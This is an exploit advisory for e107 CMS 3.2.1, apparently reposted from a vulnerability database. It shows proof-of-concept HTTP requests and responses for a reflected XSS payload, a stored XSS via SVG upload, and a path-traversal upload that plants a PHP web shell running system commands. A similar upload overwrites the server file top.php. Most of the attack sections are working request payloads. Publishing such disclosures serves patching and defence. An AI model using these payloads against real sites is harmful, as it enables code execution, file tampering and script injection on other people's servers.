e107 CMS 3.2.1 Arbitrary File Upload / Cross Site Scripting

2022.05.11
Risk: High
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities # Date: 30/04/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 3.2.1 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Reflected - Via adding comment (Authenticated) # POC Request: GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40 Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 08:02:42 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "71d7966eaa95fd8ac14da8baf3e0785d" Content-Length: 25059 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...] <div class='media' > <form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' > [...] User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field image.png ### Upload restriction bypass (Authenticated [Admin]) + Stored Xss. Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file) image->media manager->upload a file->Image/File URL admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg # POC Request: POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 90 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption= Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 02:06:14 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "06ed5ef56b0f736995112cafd77e9ec0" Content-Length: 20878 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...] <div class='well clearfix media-carousel-item-container'> <a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span> </a> [...] image.png ### Upload restriction bypass (Authenticated [Admin])+RCE Upload and execute .PHP file Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory. image.png Media Manager-> Media Upload/Import -> From a remote location # POC Request POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:02:08 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...] We can see uploaded PHP file on the server side. image.png cmd.php file source: <?php system('whoami'); ?> image.png ### Upload restriction bypass (Authenticated [Admin])+ Server file override Attacker can override example top.php file in the main directory of web application. Original file top.php in server: image.png We can override file via following upload functionality: Media Manager-> Media Upload/Import -> From a remote location # POC Request: POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:20:10 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...] top.php file content was tampered:


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top